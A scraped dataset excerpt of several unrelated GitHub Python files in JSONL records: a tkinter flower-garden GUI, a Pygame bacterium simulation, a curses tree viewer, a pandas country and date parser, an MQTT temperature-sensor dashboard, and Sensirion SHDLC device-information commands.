Default is 10.\r\n Returns:\r\n rand_colors: a string of a hex color\r\n \"\"\"\r\n t=0; rand_colors=start\r\n while t < herit: #re-roll one random hex digit per pass; position 0 is the '#'\r\n i = random.randint(1, 6)\r\n rand_colors = rand_colors[:i] + random.choice('0123456789ABCDEF') + rand_colors[i+1:]\r\n t+=1\r\n return rand_colors\r\n\r\ndef check_Green(color):\r\n \"\"\"Check whether a hex color reads as green\r\n Parameters:\r\n color: hex color string such as '#00FF00'\r\n Returns:\r\n True if the green channel dominates red and blue, otherwise False\r\n \"\"\"\r\n rr = int(color[1:3], 16)\r\n gg = int(color[3:5], 16)\r\n bb = int(color[5:7], 16)\r\n if gg>rr and gg>bb:\r\n return True\r\n else:\r\n return False \r\n\r\ndef make_Green(color):\r\n \"\"\"Generate random hex colors until a green color is returned\r\n Parameters:\r\n color: initial value for hex.\r\n Returns:\r\n color: final value for hex, now green\r\n \"\"\"\r\n if DEBUG_L2 == True: print(\"Now Running: make_Green.\")\r\n result = check_Green(color)\r\n if DEBUG_L2 == True: print(\"is\", color,\" green?: \", result)\r\n while result is False:\r\n color=create_Colors(color)\r\n result = check_Green(color)\r\n if DEBUG_L2 == True: print(\"Updated: is \", color, \" green?: \", result)\r\n return color \r\n \r\nif __name__ == '__main__':\r\n hl_debug=0\r\n if DEBUG == True: hl_debug=2\r\n \r\n #Create Frames & Layout\r\n dimensions = Dimensions(width=1000)\r\n\r\n frame_lbar = tk.Frame(root, highlightthickness=hl_debug, bg=\"yellow\", width=dimensions.lbar_nav[2], height=dimensions.cnv[3])\r\n frame_rbar = tk.Frame(root, highlightthickness=hl_debug, width=dimensions.cnv[2], height=dimensions.cnv[3])\r\n frame_lbar.pack(side=tk.LEFT, pady=5, padx=2.5, fill=tk.BOTH)\r\n frame_rbar.pack(side=tk.RIGHT, pady=5, padx=2.5, fill=tk.BOTH) \r\n\r\n frame_lbar_top = tk.Frame(frame_lbar)\r\n frame_lbar_top.pack(side=tk.TOP, fill=tk.BOTH)\r\n frame_lbar_logo = tk.Frame(frame_lbar_top, highlightthickness=hl_debug, width=dimensions.lbar_logo[2], height=dimensions.lbar_logo[3])\r\n frame_lbar_ttl = tk.Frame(frame_lbar_top, highlightthickness=hl_debug, width=dimensions.lbar_ttl[2], height=dimensions.lbar_ttl[3])\r\n frame_lbar_logo.pack(side=tk.LEFT, fill=tk.BOTH) \r\n frame_lbar_ttl.pack(side=tk.RIGHT, fill=tk.BOTH) \r\n frame_lbar_gene = tk.Frame(frame_lbar, highlightthickness=hl_debug, width=dimensions.lbar_gene[2], height=dimensions.lbar_gene[3])\r\n frame_lbar_gene.pack(fill=tk.BOTH)\r\n frame_lbar_bot = tk.Frame(frame_lbar, highlightthickness=1, bg=\"green\", width=dimensions.lbar_nav[2], height=dimensions.lbar_nav[3])\r\n frame_lbar_bot.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l = tk.Frame(frame_lbar_bot, width=dimensions.lbar_nav[2]/2)\r\n frame_lbar_nav_l.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_r = tk.Frame(frame_lbar_bot, width=dimensions.lbar_nav[2]/2)\r\n frame_lbar_nav_r.pack(side=tk.RIGHT, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_1=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_2=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_3=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_1=tk.Frame(frame_lbar_nav_r, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_2=tk.Frame(frame_lbar_nav_r, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_3=tk.Frame(frame_lbar_nav_r, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_1.pack(side=tk.TOP, fill=tk.BOTH, expand=True); frame_lbar_nav_r_1.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_2.pack(fill=tk.BOTH, expand=True); frame_lbar_nav_r_2.pack(fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_3.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True); frame_lbar_nav_r_3.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)\r\n \r\n #Place Widgets within Frames & Define Buttons\r\n canvas = tk.Canvas(frame_rbar, width = dimensions.cnv[2], height = dimensions.cnv[3], bg='#d0e0e3'); canvas.pack(fill=tk.BOTH)\r\n MyGarden = Garden(dimensions, canvas)\r\n\r\n title = 
tk.Label(frame_lbar_ttl, text=\"***SEED***\", font=(\"bold\", 20)); title.pack()\r\n logo = tk.Label(frame_lbar_logo, text=\"***LOGO***\", font=(\"bold\", 20)); logo.pack()\r\n \r\n userinput_genes = tk.Entry(frame_lbar_gene, width=50); userinput_genes.pack(padx=10, pady=10, side = tk.LEFT, fill=tk.X)\r\n submit_button = tk.Button(frame_lbar_gene, text = \"Submit\"); submit_button.pack(pady=10, side = tk.RIGHT)\r\n \r\n plant_button = tk.Button(frame_lbar_nav_l_1, text = \"ALL NEW\",\r\n command = MyGarden.grow_FullGarden); plant_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n weed_button = tk.Button(frame_lbar_nav_l_2, text = \"[REMOVE]\"); weed_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n mix_button = tk.Button(frame_lbar_nav_l_3, text = \"[BREED]\"); mix_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n self_button = tk.Button(frame_lbar_nav_r_1, text = \"[SELF]\"); self_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n save_button = tk.Button(frame_lbar_nav_r_2, text = \"[SAVE]\"); save_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n till_button = tk.Button(frame_lbar_nav_r_3, text = \"CLEAR ALL\",\r\n command = MyGarden.grow_EmptyGarden); till_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n\r\n #Create Plots and Grow Initial Plants from Scratch\r\n MyGarden.grow_FullGarden() \r\n root.mainloop()\r\n\r\n\r\n","repo_name":"MalachitesTower/FlowerGarden","sub_path":"tkfowers3.py","file_name":"tkfowers3.py","file_ext":"py","file_size_in_byte":23685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27811028847","text":"import random\n\n\nclass Atom():\n def __init__(self, name, speed):\n self.x = random.choice(range(50, 550))\n self.y = random.choice(range(50, 350))\n self.height = 10\n self.width = 10\n self.speed = speed\n self.color = (0,255,50)\n self.sight = 450\n self.count = 0\n self.name = name\n\n\n #поедание\n def eat(self, food_lst):\n for food in food_lst:\n if food.x in range(self.x-9, self.x+9) and food.y in range(self.y-9, self.y+9):\n food.x = random.choice(range(5, 550))\n food.y = random.choice(range(5, 350))\n self.count += 1\n print(self.name, 'Съедено:', self.count)\n\n\n def move(self):\n move_up = random.choice(range(4))\n move_down = random.choice(range(4))\n move_left = random.choice(range(4))\n move_right = random.choice(range(4))\n\n move_list = [move_up, move_down, move_left, move_right]\n\n for i in move_list:\n if move_list[0] == 3 and self.y > 10:\n self.y -= self.speed\n break\n if move_list[1] == 3 and self.y < 390:\n self.y += self.speed\n break\n if move_list[2] == 3 and self.x > 10:\n self.x -= self.speed\n break\n if move_list[3] == 3 and self.x < 590:\n self.x += self.speed\n break\n else:\n pass\n\n\n def hunt(self, food_lst):\n for food in food_lst:\n if food.x in range(self.x-self.sight, self.x+self.sight) and food.y in range(self.y-self.sight, self.y+self.sight):\n if self.x > food.x:\n self.x -= self.speed\n if self.x < food.x:\n self.x += self.speed\n if self.y > food.y:\n self.y -= self.speed\n if self.y < food.y:\n self.y += self.speed\n","repo_name":"tihon49/PyGame","sub_path":"bacterium/src/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37242620761","text":"import curses\nimport time\nfrom functools import partial\n\nfrom vert_tree.base import BaseTreeDisplay, TreeDisplayError\nfrom 
vert_tree.common import Edge\n\n\nclass CursesDisplay(BaseTreeDisplay):\n    def __init__(self, timeout=-1):\n        self.timeout = timeout\n        self.x = self.y = 0\n        self.function = partial(curses.wrapper, self._display_curses_tree)\n\n    def _init_display(self, tree):\n        self.height = tree.vertical_length\n        self.width = tree.total_width\n        self.root_pos = tree.left_width\n        try:\n            self.pad = curses.newpad(self.height, self.width)\n            self.pad.keypad(True)\n            curses.curs_set(0)\n        except (curses.error, OverflowError):  # avoid a bare except: only failures from the curses setup above are expected here\n            raise TreeDisplayError(\n                \"The curses lib cannot handle a tree so large! Height: {} width: {}\".format(self.height, self.width)\n            )\n        # curses reads will block for only this time amount in millis\n        self.pad.timeout(500)\n\n    def _display_curses_tree(self, stdscr, root, edge_spacing):\n        super(CursesDisplay, self)._base_display_tree(root, edge_spacing)\n        _, win_width = stdscr.getmaxyx()\n        # center pad on root element\n        if win_width < self.width:\n            self.x = self.root_pos - int(win_width / 2)\n        time_end = self._get_end_time()\n        while time.time() < time_end:\n            win_height, win_width = stdscr.getmaxyx()\n            self.pad.refresh(self.y, self.x, 0, 0, win_height - 1, win_width - 1)\n            input_char = self._get_pad_char()\n            if input_char == ord(\"q\"):\n                break\n            elif input_char == curses.KEY_UP:\n                self.y = max(self.y - 1, 0)\n            elif input_char == curses.KEY_DOWN:\n                self.y = min(self.y + 1, self.height - win_height)\n            elif input_char == curses.KEY_RIGHT:\n                self.x = min(self.x + 1, self.width - 2)\n            elif input_char == curses.KEY_LEFT:\n                self.x = max(self.x - 1, 0)\n\n    def _get_pad_char(self):\n        # used for simpler monkey patching in test\n        return self.pad.getch()\n\n    def _get_end_time(self):\n        if self.timeout >= 0:\n            return time.time() + self.timeout\n        return float(\"inf\")\n\n    def _print_edges(self, level_edges, level, width, edge_spacing, lines_required):\n        if not level_edges:\n            return\n        for edge in level_edges:\n            curr_level = 0\n            curr_pos = edge.parent_pos\n            if edge.direction == \"/\":\n                while curr_level < lines_required:\n                    curr_pos -= edge.get_step_width(edge_spacing, curr_pos - edge.child_pos)\n                    y = edge.distance_from_top + curr_level\n                    self.pad.addch(y, curr_pos, edge.direction)\n                    curr_level += 1\n            else:\n                while curr_level < lines_required:\n                    curr_pos += edge.get_step_width(edge_spacing, edge.child_pos - curr_pos)\n                    y = edge.distance_from_top + curr_level\n                    self.pad.addch(y, curr_pos, edge.direction)\n                    curr_level += 1\n\n    def _print_vertices(self, level_verts, width):\n        self._truncate_node_vals(level_verts)\n        for vertex in level_verts:\n            self.pad.addstr(vertex.distance_from_top, vertex.start, vertex.node.val)\n","repo_name":"kepplemr/vert_tree","sub_path":"vert_tree/curses_display.py","file_name":"curses_display.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38328751386","text":"import pandas as pd\nimport numpy as np\nimport re\nimport logging as log\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 1000)\npd.set_option('display.max_colwidth', 100)\npd.options.mode.use_inf_as_na = True\n\nlog.basicConfig(filename=\"debug.log\")\n\ndef findCountry(loc, co):\n    for countryVar in co:\n        countryRegex = re.compile(countryVar, re.IGNORECASE)\n        if countryRegex.search(str(loc)):  # IGNORECASE already lives in re.compile; search's second argument is a position, not a flag\n            LOC_Resolve_Country = co[0]\n            LOC_Resolve_Ostalo = loc.replace(countryVar, '')\n            LOC_Resolve_Ostalo = re.sub('^[^a-zA-ZčćžšđČĆŽŠĐ]*|[^a-zA-ZčćžšđČĆŽŠĐ]*$','', 
LOC_Resolve_Ostalo)\n break\n else:\n LOC_Resolve_Country = \"NEMA\"\n pass\n if LOC_Resolve_Country == \"NEMA\":\n return False\n else:\n return LOC_Resolve_Country, LOC_Resolve_Ostalo\n\ndef findCity(loc, ci):\n LOC_Resolve_City = False\n for cityVar in ci:\n \n# log.warning(cityVar + \"===\" + loc)\n \n cityRegex = re.compile(cityVar, re.IGNORECASE)\n if cityRegex.search(str(loc)):\n LOC_Resolve_City = ci[0]\n break\n else:\n pass\n return LOC_Resolve_City\n\ndef findDate(data):\n # 12. - 14.9.1997\n dateRegex_1 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 1997\n dateRegex_2 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 2.1997.\n dateRegex_3 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 30.11. - 1.12.1997\n dateRegex_4 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 1.2.1997.\n dateRegex_5 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n date_1 = dateRegex_1.match(data)\n date_2 = dateRegex_2.match(data)\n date_3 = dateRegex_3.match(data)\n date_4 = dateRegex_4.match(data)\n date_5 = dateRegex_5.match(data)\n if date_1:\n dateFixed = (''\n + 'OD '\n + date_1.group(1).rjust(2, '0') + '.' + date_1.group(3).rjust(2, '0') + '.'+ date_1.group(4) + '.'\n + ' DO '\n + date_1.group(2).rjust(2, '0') + '.' + date_1.group(3).rjust(2, '0') + '.'+ date_1.group(4) + '.'\n )\n elif date_4:\n dateFixed = (''\n + 'OD '\n + date_4.group(1).rjust(2, '0') + '.' + date_4.group(2).rjust(2, '0') + '.'+ date_4.group(5) + '.'\n + ' DO '\n + date_4.group(3).rjust(2, '0') + '.' + date_4.group(4).rjust(2, '0') + '.'+ date_4.group(5) + '.'\n )\n elif date_5:\n dateFixed = (''\n + 'OD '\n + date_5.group(1).rjust(2, '0') + '.' + date_5.group(2).rjust(2, '0') + '.'+ date_5.group(3) + '.'\n + ' DO '\n + date_5.group(1).rjust(2, '0') + '.' + date_5.group(2).rjust(2, '0') + '.'+ date_5.group(3) + '.'\n )\n elif date_3:\n dateFixed = (''\n + 'OD '\n + date_3.group(1).rjust(2, '0') + '.' + date_3.group(2) + '.'\n + ' DO '\n + date_3.group(1).rjust(2, '0') + '.' 
+ date_3.group(2) + '.'\n        )\n    elif date_2:\n        dateFixed = (''\n            + 'OD '\n            + date_2.group(1).rjust(4, '0') + '.'\n            + ' DO '\n            + date_2.group(1).rjust(4, '0') + '.'\n        )\n    else:\n        dateFixed = \"??.??.????.\"\n    return dateFixed\n\ndef fixAll(data, co, ci):\n    LOC_Resolve_Country = ''\n    LOC_Resolve_Ostalo = ''\n    LOC_Resolve_City = ''\n    DAT_Resolve = ''\n    \n    for idx, row in co.iterrows():\n        country = row['COUNTRY'].split(',')\n        findResult = findCountry(data[\"LOC\"], country)\n        if findResult == False:\n            pass\n        else:\n            LOC_Resolve_Country = findResult[0]\n            LOC_Resolve_Ostalo = findResult[1]\n            break\n    \n    # for idx2, row2 in ci.iterrows():\n    #     city = row2['combined'].split(', ')\n    #     findCiResult = findCity(data[\"LOC\"], city)\n    #     if findCiResult:\n    #         LOC_Resolve_City = findCiResult\n    #         break\n    \n    if str(data[\"DAT\"]) !='nan':\n        date = findDate(data[\"DAT\"])\n    else:\n        date = \"NONE\"\n    DAT_Resolve = date\n    ret = pd.Series([DAT_Resolve, LOC_Resolve_Country, LOC_Resolve_Ostalo])\n    return ret\n\n\nci = pd.read_csv(\"DATA/cities1000.txt\", nrows=1000000, sep=r\"\\t\", engine='python')\nci = ci[ci.iloc[:, 7] == \"HR\"]  # keep only the Croatian rows; .filter() does not accept a boolean mask\nci['combined'] = ci.iloc[:, 1:4].apply(lambda row: str(','.join( row.values.astype(str)).split(\",\", 7)[:7]), axis=1)\n\nci['combined'].to_csv(\"/tmp/citiesHR.csv\", sep=\"|\", quotechar=\"~\")\n\n# Import Skup list\ndf = pd.read_csv(\"DATA/skup.csv\", nrows=1000000, quotechar='~', sep=\",\")\n\n# Import Country list\nco = pd.read_csv(\"DATA/countries.txt\", nrows=1000000, quotechar='\"', sep=\"~\")\n\n# Import City list\n#ci = pd.read_csv(\"DATA/cities.csv\", nrows=1000, quotechar='\"', sep=\"~\")\n\n#f = open(\"DATA/cities.csv\", \"r\")\n\ndf[[\"DAT_Resolve\", \"LOC_Resolve_Country\", \"LOC_Resolve_Ostalo\"]] = df.apply(lambda x: fixAll(x, co, ci), axis=1)\n\ndf.to_csv(\"/tmp/bla.csv\", sep=\"|\", quotechar=\"~\")\n","repo_name":"Rudjer-Boskovic-Institute/Skupovi_FIX","sub_path":"parse_country.py","file_name":"parse_country.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11902912160","text":"#!/usr/bin/env python3\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"JSON\n\"\"\"\n\n# imports: library\nfrom typing import Any, Generator\n\n\ndef indent(steps: int = 0, size: int = 2) -> str:\n \"\"\"Indent\"\"\"\n\n return ' ' * size * steps\n\n\ndef formatter(unit: Any, indent_steps: int = 0) -> Generator:\n \"\"\"Formatter\"\"\"\n\n if isinstance(unit, list):\n for index, item in enumerate(unit):\n\n if not isinstance(item, list) and not isinstance(item, dict):\n yield f'{indent(indent_steps)}[{index}] \\'{item}\\''\n else:\n yield f'{indent(indent_steps)}[{index}]'\n for subunit in formatter(item, indent_steps + 1):\n yield subunit\n\n elif isinstance(unit, dict):\n for key, value in unit.items():\n start = f'{indent(indent_steps)}\\'{key}\\':'\n\n if not isinstance(value, list) and not isinstance(value, dict):\n yield f'{start} \\'{value}\\''\n else:\n yield start\n for item in formatter(value, indent_steps + 1):\n yield item\n\n else:\n yield str(unit)\n","repo_name":"sunarch/libmonty","sub_path":"src/libmonty/formatting/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29178215902","text":"import time\nimport datetime as dt\nfrom tkinter import *\nimport paho.mqtt.client as mqtt\nimport os\nimport csv\n# Main Tkinter application\nclass Application(Frame):\t\n\t\n\t# Create display elements\n def createWidgets(self):\n self.cur_time = Label(self, textvariable=self.time, font=('Verdana', 20, 'bold'))\n self.time.set(\"Time\")\n self.cur_time.pack() # organize in block\n\t\n self.temperature1 = Label(self, textvariable=self.temp_data1, font=('Verdana', 20, 'bold'))\n self.temp_data1.set(\"Temperature SHTC3\")\n self.temperature1.pack() # organize in block\n\t\t\n self.humidity1 = Label(self, textvariable=self.hum_data1, font=('Verdana', 20, 'bold'))\n self.hum_data1.set(\"Humidity SHTC3\")\n self.humidity1.pack()\n\t\t\n self.temperature2 = Label(self, textvariable=self.temp_data2, font=('Verdana', 20, 'bold'))\n self.temp_data2.set(\"Temperature TMP117\")\n self.temperature2.pack()\n\t\t\n self.temperature_alarm = Label(self, textvariable=self.temp_data_alarm, fg = 'red', font=('Verdana', 20, 'bold'))\n self.temp_data_alarm.set(\"Temperature Alarm\")\n self.temperature_alarm.pack() # organize in block\n\t\t\n self.humidity_alarm = Label(self, textvariable=self.humid_data_alarm, fg = 'red', font=('Verdana', 20, 'bold'))\n self.humid_data_alarm.set(\"Humidity Alarm\")\n self.humidity_alarm.pack() # organize in block\n\t\t\n # Init the variables & start measurements\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.time = StringVar() # used for widget text edit\n self.temp_data_alarm = StringVar()\n self.humid_data_alarm = StringVar()\n self.temp_data1 = StringVar()\n self.hum_data1 = StringVar()\n self.temp_data2 = StringVar()\n self.createWidgets()\n self.pack()\n self.timer()\n\t\t\n # show current time\t\n def timer(self):\n self.time.set(str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n self.cur_time.pack()\n # update time every second\n self.after(1000, self.timer)\n\t\t\n # update data received from MQTT broker\t\n def receiveData_t1(self, t_data):\n self.temp_data1.set(\"Temperature SHTC3 : \" + t_data+ \" oC\")\n self.temperature1.pack()\n def receiveData_h1(self, h_data):\n self.hum_data1.set(\"Humidity SHTC3 : \" + h_data+ \" %\")\n self.humidity1.pack()\t\n def 
receiveData_t2(self, t_data):\n self.temp_data2.set(\"Temperature TMP117: \" + t_data + \" oC\")\n self.temperature2.pack()\t\n def receiveData_a_t(self, t_data):\n self.temp_data_alarm.set(t_data)\n self.temperature_alarm.pack()\n def receiveData_a_h(self, h_data):\n self.humid_data_alarm.set(h_data)\n self.humidity_alarm.pack()\n\t\t\n # write to csv file\n def write_csv_data(self, filename, data, time_data):\n with open(filename, mode = 'a') as f:\n f_writer = csv.writer(f, delimiter = ',')\n f_writer.writerow([data, time_data])\n\n def write_csv_header(self, filename, header1, header2):\n with open(filename, mode = 'a') as f:\n f_writer = csv.writer(f, delimiter = ',')\n f_writer.writerow([header1, header2])\n#########################################################################\n# MAIN \n# receive temperature and humidity from sensors through MQTT in real time\n##########################################################################\napp = Application()\n\ncsv_filename_t_alarm = \"temperature_alarm.csv\"\ncsv_filename_t_tmp117 = \"temperature_TMP117.csv\"\ncsv_filename_t_shtc3 = \"temperature_SHTC3.csv\"\ncsv_filename_h_shtc3 = \"humidity_SHTC3.csv\"\nheader1 = 'temperature'\nheader2 = 'humidity'\nheader3 = 'time'\n\n# prepare header for csv file for temperature TMP117\nif not(os.path.isfile(csv_filename_t_tmp117)):\n app.write_csv_header(csv_filename_t_tmp117, header1, header3)\n# prepare header for csv file for temperature SHTC3\nif not(os.path.isfile(csv_filename_t_shtc3)):\n app.write_csv_header(csv_filename_t_shtc3, header1, header3)\n# prepare header for csv file for himidity SHTC3\t\nif not(os.path.isfile(csv_filename_h_shtc3)):\n app.write_csv_header(csv_filename_h_shtc3, header2, header3)\t\n\t\n# receive data from MQTT broker and update these values\ndef messageFunction_t1 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_t1(message)\n app.write_csv_data(csv_filename_t_shtc3, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_t1 = mqtt.Client(\"Client_SHTC3_t\") \nclient_t1.connect(\"test.mosquitto.org\", 1883) \nclient_t1.subscribe(\"NhanIOT/test/t_data_SHTC3/\") \nclient_t1.on_message = messageFunction_t1 # Attach the messageFunction to subscription\nclient_t1.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_h1 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_h1(message)\n app.write_csv_data(csv_filename_h_shtc3, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_h1 = mqtt.Client(\"Client_SHTC3_h\") \nclient_h1.connect(\"test.mosquitto.org\", 1883) \nclient_h1.subscribe(\"NhanIOT/test/h_data_SHTC3/\") \nclient_h1.on_message = messageFunction_h1 # Attach the messageFunction to subscription\nclient_h1.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_t2 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_t2(message)\n app.write_csv_data(csv_filename_t_tmp117, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_t2 = mqtt.Client(\"Client_TMP117\") \nclient_t2.connect(\"test.mosquitto.org\", 1883) \nclient_t2.subscribe(\"NhanIOT/test/t_data_TMP117/\") \nclient_t2.on_message = messageFunction_t2 # Attach the messageFunction to 
subscription\nclient_t2.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_a_t (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_a_t(message)\n #app.write_csv_data(csv_filename_t_alarm, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_a_t = mqtt.Client(\"Client_alarm_t\") \nclient_a_t.connect(\"test.mosquitto.org\", 1883) \nclient_a_t.subscribe(\"NhanIOT/test/alarm_t/\") \nclient_a_t.on_message = messageFunction_a_t # Attach the messageFunction to subscription\nclient_a_t.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_a_h (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_a_h(message)\n #app.write_csv_data(csv_filename_t_alarm, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_a_h = mqtt.Client(\"Client_alarm_h\") \nclient_a_h.connect(\"test.mosquitto.org\", 1883) \nclient_a_h.subscribe(\"NhanIOT/test/alarm_h/\") \nclient_a_h.on_message = messageFunction_a_h # Attach the messageFunction to subscription\nclient_a_h.loop_start() # Start the MQTT client\n\napp.mainloop()","repo_name":"tlcnhan/THSensor","sub_path":"sensor_gui.py","file_name":"sensor_gui.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37664445039","text":"from __future__ import absolute_import, division, print_function\nfrom sensirion_shdlc_driver.command import ShdlcCommand\nfrom struct import pack, unpack\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass SensorBridgeCmdDeviceInformationBase(ShdlcCommand):\n \"\"\"\n SHDLC command 0xD0: \"Device Information\".\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(SensorBridgeCmdDeviceInformationBase, self).__init__(\n 0xD0, *args, **kwargs)\n\n\nclass SensorBridgeCmdGetProductType(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Product Type Command\n\n Gets the product type from the device.\n \"\"\"\n super(SensorBridgeCmdGetProductType, self).__init__(\n data=b\"\".join([bytes(bytearray([0x00]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the product type.\n :rtype: str\n \"\"\"\n prod_type = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return prod_type\n\n\nclass SensorBridgeCmdGetProductName(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Product Name Command\n\n Gets the product name from the device.\n \"\"\"\n super(SensorBridgeCmdGetProductName, self).__init__(\n data=b\"\".join([bytes(bytearray([0x01]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the product name.\n :rtype: str\n \"\"\"\n prod_name = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return prod_name\n\n\nclass SensorBridgeCmdGetArticleCode(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Article Code Command\n\n Gets the article code from the device.\n \"\"\"\n super(SensorBridgeCmdGetArticleCode, self).__init__(\n 
data=b\"\".join([bytes(bytearray([0x02]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the article code.\n :rtype: str\n \"\"\"\n article_code = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return article_code\n\n\nclass SensorBridgeCmdGetSerialNumber(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Serial Number Command\n\n Gets the serial number from the device.\n \"\"\"\n super(SensorBridgeCmdGetSerialNumber, self).__init__(\n data=b\"\".join([bytes(bytearray([0x03]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the serial number.\n :rtype: str\n \"\"\"\n serial_no = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return serial_no\n","repo_name":"Sensirion/python-shdlc-sensorbridge","sub_path":"sensirion_shdlc_sensorbridge/commands/device_information.py","file_name":"device_information.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7392823187","text":"import os\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, OrdinalEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, mean_absolute_percentage_error, \\\n explained_variance_score\n\nfrom functions.functions import *\nfrom functions.feature_eng import *\nfrom functions.plots import *\n\nPLOT = False # Mark plot is 'True' for updating the plots in folder figures\nSEED = 1 # Random seed for model training\nTRAIN = True # Mark train is 'True' for 